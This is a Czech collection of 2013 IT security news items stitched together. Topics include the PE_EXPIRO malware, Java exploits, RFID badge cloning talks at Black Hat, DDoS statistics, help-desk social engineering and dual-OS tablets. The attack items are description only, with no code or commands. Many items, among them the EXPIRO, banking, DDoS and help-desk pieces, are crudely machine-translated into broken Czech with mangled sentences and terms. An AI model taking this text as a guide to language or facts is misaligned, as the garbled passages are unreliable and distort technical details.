Zde se v praxi uplatňuje účinná metoda „legislativního biče“. V zákoně o elektronickém podpisu (č. 227/2000 Sb.), konkrétně v jeho paragrafu 5, je stanoveno, že pokud někdo neprovede všechny úkony potřebné k ověření platnosti elektronického podpisu, a přesto se na jeho platnost spoléhá a jedná podle toho, nese i případnou škodu, pokud z toho nějaká vznikne. Přitom právě kontrola toho, zda došlo či nedošlo k revokaci certifikátu, je jedním z těchto „úkonů, potřebných k ověření platnosti“.
Možnost průniku do Google Glass je jen drobnost
Naše soukromí, a to už nejen to online, ohrožuje spousta dalších věcí. S tím, jak internet proniká v podstatě všude, přináší s sebou kromě řady výhod i narůstající množství hrozeb. Od bující počítačové kriminality po rozšířený dohled státu.
Hacking
Nedávná zpráva o tom, že i do chytrých brýlí Google Glass je možné proniknout bez vědomí majitele, asi překvapila málokoho. Pokud se tedy útočník zmocní systému počítače na tělo, může jeho prostřednictvím zasahovat nejen do soukromí majitele, ale i do soukromí všech, které má na dohled. Potom se nabízejí různé scénáře. Pokud totiž bude zneužitelnými počítači na tělo – které opravdu zneužity budou a navíc budou i zapojeny do jakési obdoby klasického botnetu – vybavena významná část populace, nebude pak třeba problém sledovat libovolnou osobu, která se pohybuje na veřejnosti. Možností je opravdu mnoho a omezuje je jen naše fantazie.
Jak už to s technologiemi bývá, každou, která je prvotně vyvíjena jako lidstvu prospěšná, je možno dříve nebo později zneužít. I když se politici tváří, že podobné technologie sváží dostatečnou legislativou, Google ani nikdo jiný nemůže nikdy zaručit, že jeho zařízení nikdo nezneužije. Zneužitím je myšleno jak vědomé zneužití majitelem, který může například fotografovat nebo natáčet ostatní lidi kolem sebe v nejrůznějších situacích, tak průnik útočníka do systému. Zatímco to první mohou výrobci ovlivnit potřebou nějaké zjevně signalizace, že majitel počítače na tělo právě fotografuje nebo natáčí, druhý případ je zcela mimo jejich možnosti.
Útočníci – nebo vládní organizace – mohou do přístrojů proniknout buď násilím, nebo mohou vytvořit nějakou aplikaci, která kromě inzerované funkce bude také tajně dodávat různé informace svému tvůrci. Tyto programy se sice v převážné většině nedostanou do oficiálních obchodů s aplikacemi pro jednotlivé operační systémy, ale existují i další způsoby distribuce, u kterých žádné bezpečnostní kontroly neexistují.
Teď už víme, že systém Android pro Google Glass není nezranitelný. Stejně jako všechny ostatní operační systémy. Musíme s tím proto počítat a zařídit se podle toho. Nic jiného nám nezbývá.
Soubor infikuje EXPIRO hity USA, krade přihlašovací údaje FTP 21.07.2013 Hacking | Zranitelnosti | Viry Neobvyklý útok byl spatřen ve volné přírodě, pomocí nečekanou kombinaci hrozeb. Tento útok používá využívat sestavy (zejména Java a PDF exploit) dodat souborů škodlivin na zranitelné systémy. Je zajímavé, že tyto soubory škodlivin mít k dispozici postupy úniku informací, což je chování, není obvykle možné nalézt mezi soubory škodlivin. Jedná malware jsou součástí rodiny PE_EXPIRO, že soubor škodlivin byl poprvé spatřen spatřen v roce 2010. . Kromě standardních rutin souborů infekce, varianty viděné v tomto útoku také rutiny úniku informací, neobvyklé rutina souborů škodlivin infekce řetěz zní asi takto:
Uživatel je lákal na škodlivé stránky, která obsahuje exploit kit. Několik exploity jsou používány, jeden z nich je exploit Java (detekován jako JAVA_EXPLOIT.ZC), který používá CVE-2012-1723. Další chyba Java (CVE-2013-1493) je také používán. PDF exploit je také používán s škodlivého souboru PDF detekované jako TROJ_PIDIEF.JXM. Ať už se používá exploit, konečný výsledek je stejný: matka infikuje soubor (ať už PE_EXPIRO.JX-O, PE_EXPIRO.QW-O, nebo PE64-EXPIRO-O pro 64-bitové systémy) do postiženého systému. Jakmile se na postiženém systému, hledá. EXE soubory v systému infikovat. Všechny složky ve všech dostupných jednotek (odnímatelné, sdílené síťové) jsou podrobeny vyhledávání. Infikované soubory jsou detekovány jako PE_EXPIRO.JX. To krade systémové a uživatelské informace, jako je například Windows Product ID, disku, sériové číslo, verze pro Windows a pověření přihlášení uživatele. To také krade uložené FTP pověření od klienta FileZilla FTP. Ukradené informace jsou pak uloženy v. DLL soubor a nahrát na různé velení a řízení (C & C) servery. Zde je diagram z výše uvedeného řetězce, pomocí exploit Java jako příklad:
Asi 70% z celkového počtu infekcí je ve Spojených státech. Je možné, že tento útok měl krást informace od organizací nebo ohrozit webových stránek, jako zvláštní zaměření na FTP pověření naznačuje buď bylo možné. Kombinace použitých hrozeb je velmi neobvyklé a naznačuje, že tento útok nebyl off-the- . police útok, který se používá běžně dostupné počítačové trestné činnosti nástroje Autor: Rhena Inocencio, Threat Response inženýr Trend Micro. Doplňující analýza Dexter, Kai Yu a Jethro Bacani.
Škodlivý URL v zóně. Lc Dmitry Bestuzhev 20. července Incidenty | Hacking Při analýze podezřelých adres URL Zjistil jsem, že stále více a více nebezpečné adresy URL, jsou zasílány z . lc domény, které formálně patří do Santa Lucia se nachází v zemi, ve východní části Karibského moře. Naše statistiky potvrzují tento trend.
Počítačoví zločinci z různých míst na světě aktivně využívají tuto doménu, včetně zločinců z Brazílie, kteří zneužívají Zdarma web hosting k dispozici v této zemi.
Kolik legitimní domén v zóně. Lc jste někdy navštívit ve vašem životě? Je-li odpověď je nulová, takže možná je na čase začít filtrování přístupu k této oblasti, zejména pokud jde o firemní firewall / proxy vrstvy.
Manažer bezpečnosti: Jak moudře investovat nečekaných 200 tisíc
Když je vám překvapivě nabídnuta možnost investovat do zabezpečení částku navíc, řeknete ano a teprve potom zjišťujete, za co ji utratíte.
Bezpečnost
Trouble Ticket Co řešit: Do rozpočtu zabezpečení informací nečekaně přibylo 200 tisíc korun. Akční plán: Rychle a moudře rozhodnout, co za tyto peníze koupit.
Máme skrovné oddělení IT. Jeho poměrný rozpočet je menší, než představuje oborový průměr, a náš rozpočet na bezpečnost činí jen tři procenta z této částky. Jak si tedy dokážete představit, vůbec jsem neváhal říci ano, když jsem byl minulý týden dotázán, zda bych dokázal do konce měsíce utratit 200 tisíc korun navíc.
Rozhodl jsem se se svým týmem provést několik taktických nákupů pro zaplnění mezer v našem programu správy zranitelností. Prvním nákupem byla služba pro skenování hranice naší sítě.
Při zavádění nových technologií je první volbou v naší společnosti obvykle SaaS (software jako služba). Nedávno jsme ale zrušili službu skenování hranice, protože licenční model příslušného poskytovatele nebyl z hlediska nákladů příliš efektivní a existovala omezení typů skenovaných zranitelností.
S nečekaným přílivem financí jsme si tak mohli pořídit službu novou, se kterou jsme mnohem spokojenější. Jedna nevýhoda tu ale přece jen je. Nenabízí automatizované upozornění e-mailem, což znamená, že se naši analytici budou muset manuálně přihlašovat a zjišťovat, zda se nevyskytlo něco podezřelého.
Dále jsme se rozhodli koupit nástroj BurpSuite, kterého jsme si všimli už během uplynulého roku, když nám nezávislé firmy dělaly řadu vyhodnocení bezpečnosti. BurpSuite je jedním z produktů, které jsou používány ke zjišťování webových zranitelností.
To nám umožní kontrolovat a upravovat přenosy mezi prohlížečem a webovými aplikacemi či manipulovat s daty zasílanými z prohlížeče na server. Nástroj BurpSuite již například zjistil chybu v logice změny hesla u jedné z našich aplikací pro komunikaci se zákazníky.
Skvělý nástroj Poté jsme ještě měli dost peněz na koupi verze produktu Metasploit i s podporou výrobce. Tento výjimečný nástroj je cenným doplňkem řešení pro skenování a vyhodnocení zranitelností a měl by být součástí produktové sady každého bezpečnostního profesionála.
Skenování příliš často informuje o zranitelnosti, ale neřekne vám dost informací pro jednoznačné ověření výsledků, aby byli vaši „zákazníci“ spokojeni. Řeknete aplikačnímu nebo serverovému týmu, že jste odhalili zranitelnost, kterou je nutno odstranit, a jejich odpověď je: „Dokažte nám, že tato chyba je opravdu něco, čeho bychom se měli obávat.“
Potom musíte na internetu hledat zdrojový kód nebo dlouhé vysvětlení, jak lze zmíněnou chybu zneužít. Metasploit vás těchto mrzutostí zbaví tím, že nabízí informace o mnoha běžných exploitech na jednom místě.
Bezpečnější Wi-Fi Z našich dvou set tisíc už toho teď mnoho nezbylo. Nechtěl jsem je však promarnit, takže jsem dál přemýšlel o dalších nástrojích, které by mohly být pro tým přínosné. Jedna věc, kterou jsem už dlouho chtěl zlepšit, je naše schopnost zjistit přítomnost nepovolených zařízení, která se dostala do naší sítě přes Wi-Fi.
Bezdrátové přístupové body u nás jsou konfigurovány stejným způsobem a máme velmi přísný bezpečnostní model, který umožňuje přístup přes přístupové body pouze „oprávněným“ zařízením se systémem Windows.
To ale nezabrání zaměstnancům přinést si vlastní bezdrátové access pointy a zapojit je do ethernetových portů na svém pracovním stole nebo v konferenční místnosti.
Chytili jsme pár takových jedinců při činu a slyšeli výmluvy jako: „Nevěděl jsem, že máme firemní řešení pro bezdrátový přístup,“ „Nemohl jsem používat svůj iPad přímo na firemní Wi-Fi,“ nebo „Potřeboval jsem připojit svůj notebook s Linuxem k WLAN.“
Protože zatím nemáme nasazeno řízení přístupu k síti (NAC) a jelikož současné skenery či sniffery nezjistí efektivně všechny typy neautorizovaných bezdrátových zařízení, rozhodl jsem se koupit odlehčený tablet PC a vyhradit ho jako přenosné detekční Wi-Fi zařízení.
V závislosti na tom, co si můžeme dovolit, tento tablet vyzbrojíme něčím, jako je třeba AirMagnet od firmy Fluke Networks nebo open source nástroji Kismet a NetStumbler. Když potom někdo z nás – já nebo některý z našich analytiků – pojede do vzdálených poboček, může s sebou vzít tento vyhrazený vyhledávač nebezpečných zařízení Wi-Fi.
Budoucnost elektronické platby: Smartphone autentizace a rozpoznávání obličeje 19. července 2013. Zabezpečení Výběru hotovosti z bankomatů pomocí debetní nebo kreditní kartou, nebo s ní platit v point-of-sale může brzy stát minulostí, protože několik výrobců prezentovány technologie, které umožňují uživatelům provádět stejné akce jednoduše pomocí jejich smartphone nebo dokonce jejich tvář. se sídlem v USA finanční self-servis a bezpečnostní společnost Diebold, která spolupracuje s mobilním Paydiant peněženka poskytovatele a vytvořil cardless Mobile Cash Access (MCA) řešení, které nejen eliminuje hrozbu karty skimming na bankomatu, ale také umožňuje finančním institucím poskytnout bezpečné mobilní peněženky řešení bez nutnosti instalace dalšího hardware bankomatů nebo point-of-prodeje (POS) terminály. "Řešení umožňuje spotřebitelům předstupeň hotovosti na smartphone zařízení vytváří kooperativní interakci s bankomatu . Na bankomatu, spotřebitelé ověřit sami skenováním unikátní QR kód, který signalizuje Bankomat obejít hotovosti přes šifrované spojení k mraku, "vysvětlili. Dalším řešením od stejné společnosti je jejich tisíciletá-inspiroval ATM, který se vyznačuje uživatele rozhraní, které umožňuje touch gesta běžně používané s chytrými telefony a tablety zařízení, jakož i propojení s mobilními zařízeními prostřednictvím cloudu. Tato nová ATM rozhraní umožňuje uživatelům (mimo jiné) vybírat peníze bez použití jejich smartphonů a vykonávat osoby na osoba plateb. "dokončit cardless stažení, zaregistrována banka zákazník skenuje Bankomaty QR kód pomocí svého smartphonu. Pokud zařízení synchronizovat přes mrak, transakce se objeví obrazovka telefonu, kde si zákazník vybere pro odstoupení od smlouvy částku. cloud Server pak odešle jednorázový kód telefonu, který zákazník vstoupí na obrazovce bankomatu k ověření transakce a přijímat peníze, "vysvětlila firma. rozpoznávání obličeje lze také použít namísto QR kódu. osoby na osobu platby popraven uživatelem zřízení předběžnou představeno transakce volbou množství a příjemce kontaktní informace, volitelný od uživatele smartphone seznamu kontaktů. Příjemce pak dostane jednorázový kód, který by mohl použít v bankomatu nebo bankovní pobočky vybrat peníze. Tyto bankomaty jsou naplánovány k dispozici pro použití do konce roku.
Finsko-based Uniqul zvolila rozpoznávání obličeje ve výchozím nastavení, a říká, že jejich řešení je transakce šestkrát rychlejší, snazší a bezpečnější. "Věříme, že jsme vyvinuli nejbezpečnější a pohodlný platební systém k dispozici," říkají s tím, že armádní algoritmy ujistěte se, že bezpečnost jejich systém je bez poskvrnky. Jak se uživatel přiblíží k pokladní, tablet provádí rozpoznávání obličeje pomocí zaznamenávání a zpracování jeho biometrické údaje, najít ten správný účet v naší databázi. Po koupili položky byly registrovány, jediná věc, kterou pro uživatele je, aby transakci schválit stisknutím tlačítka "OK". ale služba není zdarma: uživatelé, kteří chtějí používat systém v obchodech v 1 -2 km poloměr od zvolené oblasti je třeba zaplatit 0,99 € měsíční poplatek, ti, kteří by omezit své nákupy pomocí této metody do jejich města muset zaplatit 1,99 €, a mezinárodní zákazníci budou muset rozloučit s 6,99 € za měsíc pro potěšení . Tablety jsou dotčené v závěrečných fázích výroby, a brzy bude nasazen v oblasti Helsinek.
Hlavní zabezpečení v sadě Office zabezpečení a RFID systémů 19. července 2013. Zabezpečení Na konferenci Black Hat v Las Vegas budou vědci odhalí kritické chyby v mnoha světových nejpoužívanějších stavebních systémů zabezpečení a RFID systémů založených na kont.
Bishop Fox Senior Security Analytici Drew Porter a Stephen Smith a partner Fran Brown bude prezentovat dvě oddělené rozhovory, které předvést metody obcházení fyzických bezpečnostních systémů používaných v budovách, miliony po celém světě. Budou odhalit zranitelnost badging systémy široce používané pro řízení přístupu do budov a zabezpečených prostorách. Ve své řeči, Porter a Smith ukazují nedostatky v digitálních systémů a senzorů používaných více než 36 milionů kanceláři, budově a bezpečnostní systémy ve Spojené státy americké. Oba vědci se podat podrobný popis metod, které mohou být použity, aby se zabránilo vypnutí z běžně používaných senzorů ostraze budov, umožňuje útočníkovi obejít elektronické alarmy a kontrolních systémů pro přístup k zabezpečeným dveře bez spuštění poplachu. Pomocí těchto metod a nástrojů , útočník může snadno proniknout do každé domácnosti a mnoho podniků bez spuštění alarmu systémy instalované uvnitř. "Co je to naprosto děsivé o těchto chyb je, jak efektivní a poškození, pokud jsou využívány," řekl Porter. "Výzkum jsme udělali ovlivňuje miliony domů a budov." Metody Porter a Smith představí umožňují nezjistitelné skryté vstupu, takže žádný fyzický znamení kompromisu. Oba vědci se bude diskutovat o tom, jak mohou signály poplašný systém být zachyceny, bez varování a odeslaných místní alarmy byl zavřen. "Věříme, že tento výzkum by se měl změnit způsob, jakým podniky a majitelé domů prohlížení elektronické zabezpečovací systémy, a doufejme, že způsob, jakým výrobci stavět, instalovat a na trhu je," Porter řekl. Browna diskuse o hackingu RFID budou prezentovány jak na Black Hat USA a DEF CON konference. Brown bude demonstrovat metody zachycení a zneužití RFID proximity odznak informace, v podstatě umožňuje útočníkům přestrojit oprávněn účastníky abyste získali přístup k zabezpečené oblasti, která vyžaduje odznak RFID pro vstup. Systémy RFID bezkontaktních kont patří mezi nejoblíbenější a jsou používány v miliony budov a podniků po celém světě. "Náchylnost RFID systémů kont bylo známé na nějakou dobu, ale až nyní se útočník musel být v rámci centimetrů legitimní odznak, aby si svá data," vysvětluje Brown. "Budeme demonstrovat metodu dosažení odznak data z několika metrů daleko, ukazuje to lze provést bez oběti znalosti. Díky tomu je možné, aby někdo zkopírovat odznak pomocí mnohem širší škálu sociálního inženýrství taktiky, a pak se vrátit později se klonované odznak a získat přístup do zabezpečené oblasti. " Ve své řeči se Brown demonstrovat metody praskání vyšší privilegia- odznaky, aby se získat přístup k vysokými nároky na zabezpečení, jako jsou datová centra a klenbami. Bude také nastínit metody pro vytváření klonované karty a výsadbu fyzické backdoor přístroje do zabezpečené oblasti, takže útočník může přijít a jít na přání.
Bankovní narušení bezpečnosti zničit důvěru zákazníků 19. července 2013. Incidenty 85 procent dospělých v USA s bankovními účty jsou alespoň trochu obavy o on-line bankovních podvodů, podle Entersekt. Takový podvod mohou obsahovat útok phishing, malware, man-in-the-browser a útoků hrubou silou. Zatímco problémem stojí za zmínku, je akce, která má vliv na konečný zdraví finanční instituce. Sedmdesát jedna procent dospělých v USA by se alespoň trochu pravděpodobné, že přejít na jiné banky v případě, že se stal obětí on-line bankovních podvodů v jejich současné bance. "Podle 2013 zprávy RSA rok v phishing, on-line bankovních podvodů je celostátní epidemie, ve kterém banky, které ztratily 1,5 miliardy dolarů tržeb v loňském roce z phishingových útoků, jsou jednoduše přijímat ztráty namísto aktivně přizpůsobuje svou obranu, "řekl Christiaan Brand, ředitel společnosti Entersekt. "Co dělá složitá otázka je zvýšená sofistikovanost hackerů, ale technologie zmařit útoky se vyvíjí taky." Podle průzkumu, téměř šest z deseti (58%) dospělých v USA je přinejmenším poněkud ochoten převzít aktivní roli při zajištění jejich online bankovní transakce, pokud to znamenalo, že používání mobilních telefonů k ověření činností, jako je nákup, přihlašovací údaje, transferů nebo vyúčtování plateb. Neexistuje žádný nedostatek produktů na trhu, které slibují spolehlivého spotřebitelského ověřování. Nejoblíbenější systémy využívají jednorázová hesla (OTP), obvykle dodáno zákazníků banky na základě hardwarového tokenu nebo pomocí textu nebo automatické hlasové zprávou na mobilní telefon. "základní vadu tyto výrobky mají, je, že i nadále spoléhat na bázi prohlížeče komunikace zpět do banky, "pokračoval Brand. "Banky jsou v nezáviděníhodné situaci, žonglovat robustní zabezpečení s spotřebitelské poptávky pro pohodlný přístup. OTP dodat taky ne. " Podle průzkumu, Američané přístup ke svým účtům on-line 10 krát za měsíc v průměru. Každá z těchto přihlašovacích údajů je buď příležitost pro hackery ukrást cenné, osobní údaje, nebo příležitost pro bankovní chránit své zákazníky a pověst.
Staré verze Javy ohrožují bezpečnost firemních systémů
Z nové studie vyplývá, že většina velkých organizací si neuvědomuje nebezpečí, které jim může přinést používání zastaralé Javy v jejich systémech.
Zranitelnosti
Navzdory výrazným zlepšením bezpečnosti Javy, které Oracle provedl za posledního půl roku, se chyby v tomto programovacím jazyku neustále objevují a ohrožují firmy po celém světě. Vyplývá to z nové studie společnosti Bit9 založené na datech ze systémů téměř čtyř set nadnárodních organizací. Podle Bit9 je nejpoužívanější verzí Javy ve firemním prostředí verze 6, jež je v 80 % korporátních počítačů.
Veřejná podpora Javy 6 byla ukončena v dubnu a pouze zákazníci Oracle s dlouhodobou placenou podporou mohou i nadále pro tuto verzi získávat aktualizace. Nejnovější verze Javy s označením 7 se podle Bit9 nachází pouze v 15 % firemních systémů. Většina organizací, které využívají Javu 6, navíc nemá nainstalované nejnovější aktualizace. A to je špatné, jelikož například ve vůbec nejpoužívanější verzi Javy 6 Update 20 je 215 bezpečnostních děr. Dalším problémem je to, že ve většině firem je nainstalováno hned několik verzí Javy naráz.
Ze studie vyplývá, že ve 42 % společností jsou nainstalovány více než dvě verze Javy současně a ve 20 % firem dokonce tři. Podle Bit9 mají organizace průměrně ve svých systémech nainstalováno 50 různých druhů Javy. Okolo pěti procent organizací pak má nainstalováno dokonce více než sto verzí. „Většina správců si neuvědomuje, že i když aktualizace Javy 7 smaže existující instalace Javy 6, kompletní nová instalace Javy 7 neodstraní starší verze,“ říká Harry Sverdlove z Bit9. Ze studie dále vyplývá, že 93 % organizací má na svých počítačích nainstalovánu verzi Javy, která je minimálně pět let stará. Jedenapadesát procent firem pak má Javu starou pět až deset let.
Problém je v tom, že pokud je v systémech společnosti nainstalováno více verzí Javy naráz, útočníci se mohou zaměřit na starší verze a proniknout díky nim do systému. Jakmile se to stane, zabezpečení novější verze Javy již nepomůže. Podle Sverdlova je sice podpora více verzí Javy na korporátních systémech zajímavá pro uživatele, avšak z bezpečnostního hlediska jde o noční můru. Díky každé nainstalované verzi tohoto programovacího jazyka je pro útočníky jednodušší proniknout do systému. Sverdlove přirovnal z bezpečnostního hlediska používání pět až deset let staré verze Javy k používání Windows 95.
Většina firem si podle expertů ani neuvědomuje, jaká rizika existence více verzí Javy na firemních systémech naráz přináší. Každá firma by si proto podle Sverdlova měla vytvořit určitou politiku používání Javy a dodržovat ji. Bit9 ve své studii nakonec dodává, že většina útoků hackerů pomocí Javy se děje prostřednictvím modulů u webových prohlížečů. Firmy by si proto měly dávat pozor také na to, aby jejich prohlížeče spolu s přídavky byly vždy aktuální.
DDoS útoky jsou stále větší, silnější a delší 18. července 2013. Počítačový útok | Incidenty Prolexic technologií oznámeným že průměrná paketů za sekundu (pps) činila 47,4 Mp a průměrná šířka pásma dosáhla 49,24 Gb na základě údajů shromážděných v 2. čtvrtletí 2013 od DDoS útoky zahájených proti své globální klientskou základnu. Tyto metriky, což představuje nárůst o 1655 procent a 925 procent, respektive v porovnání s 2. čtvrtletím 2012.
Po sestupnou tendenci v roce 2011 a část roku 2012, průměrné trvání útoku se zvyšuje, stoupá od 17 hodin v 1. čtvrtletí 2012 a 34,5 hodiny v 1. čtvrtletí 2013 na 38 hodin v tomto čtvrtletí. "útok trvání se může zvýšit, protože pachatelé jsou méně zajímají o detekci a ochraně svých botnetů, "řekl Stuart Scholly, prezident na Prolexic. "Všeobecná dostupnost napadených webových serverů dělá to hodně snadnější pro zlomyslné herci doplnit, růst a přesměrování botnety. Tradičně, botnety byly postaveny z napadených klientů. To vyžaduje šíření škodlivého softwaru přes PC a virových infekcí, a vyžaduje mnoho času a úsilí. V důsledku toho, útočníci chtěli chránit jejich klient na bázi botnetů a byli strašnější detekce, takže jsme viděli útok kratší dobu trvání. " Proti 2. čtvrtletí 2012:
33 procent zvýšení celkového počtu útoků DDoS 23 procent nárůst celkového počtu infrastruktury (Layer 3 a 4) útoky 79 procent zvýšení celkového počtu použití (vrstva 7) napadá 123 procentní nárůst v útoku trvání: 38 hodin vs 17 hodin 925 procentní nárůst průměrné šířky pásma 1655 procentní nárůst průměrné paketů za sekundu (pps) sazby. Ve srovnání s 1. čtvrtletím 2013: 20 procentní nárůst celkového počtu útoků DDoS 17 procent nárůst celkového počtu infrastruktury (Layer 3 a 4) útoky 28 procent zvýšení celkového počtu použití (vrstva 7) napadá 10 procent zvýšení útoku trvání: 38 hodin vs 34,50 hodin 2 procentní nárůst průměrné šířce pásma: 49.24 Gbps vs 48,25 Gbps 46 procent nárůst průměrné paketů za sekundu (pps) sazby Čína udržuje svou pozici jako hlavní zdrojové země pro DDoS útoků. Stejně jako v předchozích čtvrtletích, útočníci používají převážně infrastruktury směřovat útoky (Layer 3 a 4. vrstva), což představovalo 74,7 procenta všech útoků, s aplikační vrstvě útoky, které tvoří zbytek. SYN povodně útok typ volby, což představuje téměř třetinu všech útoků. Ve srovnání se stejným čtvrtletím před rokem, celkový počet DDoS útoků vzrostl 33,8 procenta. Kromě toho, celkový počet infrastruktury útoků vzrostl 23,2 procent, přičemž celkový počet aplikačních útoků (vrstva 7) se zvýšil o 79,4 procenta ve srovnání s jedním rokem. Zatímco rozdělení mezi celkovým počtem infrastruktury útoky i aplikační vrstva byla podobná dvě čtvrti, oba typy útoků zvýšil, když byly porovnány dvě čtvrtletí. Průměrný útok trvání značně vzrostly, stoupající od 17 hodin ve 2. čtvrtletí 2012 dosáhnout 38 hodin v tomto čtvrtletí, což představuje nárůst o 124 procent. Ve srovnání s 1. čtvrtletím roku 2013 se celkový počet útoků zvýšil o 20 procent. To odráží trvale vysoký stupeň popření servisního útoku aktivity po celém světě v průběhu posledních šesti měsíců. Celkové počty obou infrastruktury a aplikací útoků zvýšila 1. čtvrtletí 2013 (17,4 procenta a 28,9 procenta v tomto pořadí). Průměrný útok doba pokračoval zaškrtněte nahoru, stoupá z 34,5 hodiny za minulé čtvrtletí na 38 hodin ve 2. čtvrtletí 2013.
Sociální inženýrství vrcholy seznam help desk bezpečnostních hrozeb 18. července 2013. Hrozby Nápověda desky jsou nejčastěji kladené pomoci uživatelům při řešení společných problémů, IT, včetně resetování hesel a aplikace a problémy s připojením. Často výkon zaměstnanců helpdesku se měří podle toho, jak rychle mohou sloužit volající a problém vyřešit. Bohužel, v mnoha případech zabezpečení nehraje významnou roli v procesu, a jako výsledek, help desk staly nezamýšlené vstupní bod pro hackery a škodlivým zasvěcenci se snaží získat přístup k citlivým podnikovým zdrojům. Většina respondentů (69%) Nový průzkum SANS identifikovat sociální inženýrství jako jejich největší hrozbu pro bezpečnost help desk. Přesto většina organizací stále používá základní osobní údaje, včetně jména / umístění a zaměstnanec identifikační číslo pro ověření identity volajících do helpdesk - informace, které mohou být snadno získaný podvodníka. Kromě toho bude mnoho zaměstnanců help desk obejít bezpečnostní kontroly ve snaze být vstřícnější k volajícímu. Kromě lidské složky, nedostatek školení, nástroje a technologie také hraje klíčovou roli v celkovém zabezpečení help desk. Více než 51% respondentů uvedlo, že mají mírný přístup k helpdesku na bezpečnost jako součást svých celkových firemních bezpečnostních kontrol, ale nejsou nutně se zaměřením na vzdělávání a dalších technologií pro day-to-day činnosti. U většiny rozpočtů závisí na počtu obsluhovaných uživatelů, spíše než náklady na volání, nebo dokonce stát potenciálních narušení bezpečnosti, o zřízení návratnost investic (ROI) pro nové procesy, doplňková školení a nástroje pro každodenní podporu může být velmi obtížné. další zjištění patří:
44% respondentů zvolilo ověření volání v uživateli mnohem větší hrozba, než pro osoby samostatně výdělečně uživatelů služeb (11%). Pouze 10% respondentů zvolilo své postupy zabezpečení pro help desk jako robustní. Téměř 43% respondentů neberou náklady na bezpečnostní incident v úvahu při stanovení jejich help desk rozpočet, ale spíše Help Desk rozpočty jsou stanoveny podle počtu uživatelů. Help Desk je i nadále upřednostňovanou metodou pro zaměstnance k řešení základních problémů IT. Jeho velmi charter je lépe sloužit uživatelům a jako výsledek, help desk pracovníci mohou obsahovat nadměrné oprávnění dělat to atraktivní cíl pro sociální inženýry a technickými hackerům pokoušet se získat přístup do sítě. Za účelem vyplnění mezery o zranitelnosti helpdesku, organizace potřebují, aby přehodnotili svůj přístup, aby splňovaly požadavky na pohodlí uživatelů při současné ochraně proti hrozbám. Doporučené osvědčené postupy patří: automatizace a samoobslužné možnosti pro běžné uživatele otázek , včetně resetování hesel pomoci snížit počet chyb a slabin, které vedou k úspěšné porušení a krádežemi dat. Robustní a dalšího vzdělávání pro pracovníky helpdesku naučit se rozpoznat a reagovat na potenciální sociálního inženýrství útoky. Pokročilé nástroje . které využívají dynamické datové zdroje a nové metody ověřování přesněji identifikovat uživatele a jejich umístění Sam Curry, vedoucí technolog, RSA, bezpečnostní divize společnosti EMC, řekl: "V mnoha případech help desk je první linii obrany proti jejich porušování a zajištění by mělo být stejně důležité jako všechny ostatní důležité obchodní funkce. Nové help desk musí usilovat o rovnováhu zvýšení bezpečnosti a pohodlí koncového uživatele, která se integruje přímo do security process přidáním technologií pro automatizaci a podnikové úrovni ověřování a průběžné vzdělávání zmírnit lidské chyby. "
ATIV Q a spol. způsobí vrásky oddělení IT
Chystaný tablet ATIV Q od Samsungu zavádí nový přístup výrobců hardwaru. Univerzální konvertibilní notebook dokáže pracovat se dvěma operačními systémy. Podle aktuální situace nebo přání uživatele nabízí Windows nebo Android. Těžko soudit, nakolik bude tento dualismus vyhovovat uživatelům, správci IT však z něj asi příliš velkou radost mít nebudou.
IT
ATIV Q s úhlopříčkou 13,3 palce může fungovat jako trochu větší tablet. Po překlopení displeje se ovšem transformuje do notebooku se standardní klávesnicí. Zatímco v režimu tabletu používá Android, po překlopení na notebook přechází k Windows 8. Nedaleká budoucnost ukáže, jestli o něj projeví zájem dostatečně velký počet zákazníků, mezitím by se ovšem už správci IT a bezpečnostní odborníci měli připravit na to, že v jednom přístroji budou muset řešit všechny otázky integrace a zabezpečení dvakrát. Protože je možné očekávat, že podobných přístrojů bude postupně přibývat. Pokud se tedy konvertibilní zařízení nespokojí jen s jedním operačním systémem, ať už to bude Android, Windows, Chrome OS nebo nějaký úplně jiný.
Zařízení s podporou dvou operačních systémů, například Lenovo IdeaPad U1, prozatím příliš velký zájem zákazníků nezpůsobila, protože přechod mezi systémy nezvládají příliš plavně, soudí analytik Rob Enderle z agentury Enderle Group. Lenovo svůj model představilo již v roce 2010 a používanými systémy byly Windows 7 a Android. Společnost však již prodej pro nezájem zákazníků ukončila.
ATIV Q oproti tomu mezi systémy přepíná okamžitě, což by mohlo být ve srovnání s U1 významnou výhodou. Ale Enderle i další analytici si myslí, že oddělení IT se budou obávat o zabezpečení Androidu, a to i přes podporu odděleného prostoru pro soukromé a firemní potřeby v podobě zabezpečení Knox, které Samsung představil v únoru tohoto roku. „Podniky nemají Android příliš v lásce, protože v něm existuje velké riziko nakažení malwarem,“ prohlásil Enderle. To by se ale mohlo změnit, „pokud by bylo možné spuštění Androidu ve firemní síti zabránit.“
Patrick Moorhead, analytik z agentury Moor Insights & Strategy, je jiného názoru. „Podniky by mohly sv zkušenosti se zavedením podpory smartphonů přenést i do segmentu tabletů,“ míní Moorhead. Dodal ovšem, že stále není jasné, nakolik bude duální prostředí Knox funkční a úspěšné.
Příliš růžově nevidí situaci ani G.P. Gownder z agentury Forrester Research, podle kterého podpora dvou systémů v jednom zařízení „bude poměrně náročná.“
Analytici se nicméně shodli na tom, že ATIV Q by si mohl najít dostatečný počet zájemců o koupi, protože nabízí vynikající rozlišení 3200 x 1800 pixelů, tedy nejvíce mezi zařízeními s displejem o úhlopříčce 13,3".
Bezpečnost komunikačních sítí v praxi: Pevné sítě (II.)
Koncový zákazník velmi často nemá žádné informace o možnostech zneužití hlasové služby přes paketová data v kabelových sítích a může být otázkou času, než bude nemile překvapen výší účtu či zveřejněním privátních informací.
Zabezpečení
Jakým způsobem je zabezpečena kabelová síť? První vrstva zabezpečení je zamezení fyzickému přístupu k médiu v místech před filtrem omezujícím distribuované kanály. To je důležité, aby nebylo pro neautorizované osoby možné vytvořit odbočku bez filtru, a tím získat přístup k analogové nabídce.
Tato forma zabezpečení již ovšem postupně pozbývá důležitosti s přechodem k digitálním technologiím distribuce signálu. Digitální kanály jsou většinou chráněny šifrováním již při vstupu na distribuční trasy a bez přístupové karty je velmi obtížné získat přístup k vysílání. Základní principy zabezpečení a distribuce digitálního vysílání budou tématem budoucích dílů seriálu.
Podobným způsobem jako televizní signál jsou distribuována i data, tedy internet, ovšem s tím rozdílem, že některé kanály jsou určeny pro přenos dat směrem k operátorovi. Dalším rozdílem je, že v určitém místě mezi zákazníkem a operátorem jsou datové kanály odbočeny z kabelu a převedeny na optické médium. Důvodem je nedostatek kapacity na páteřní síti, pokud by internet od všech zákazníků vedl pouze metalickým vedením. V některých zemích se začíná rozvíjet praxe přivedení optického vlákna přímo ke klientovi.
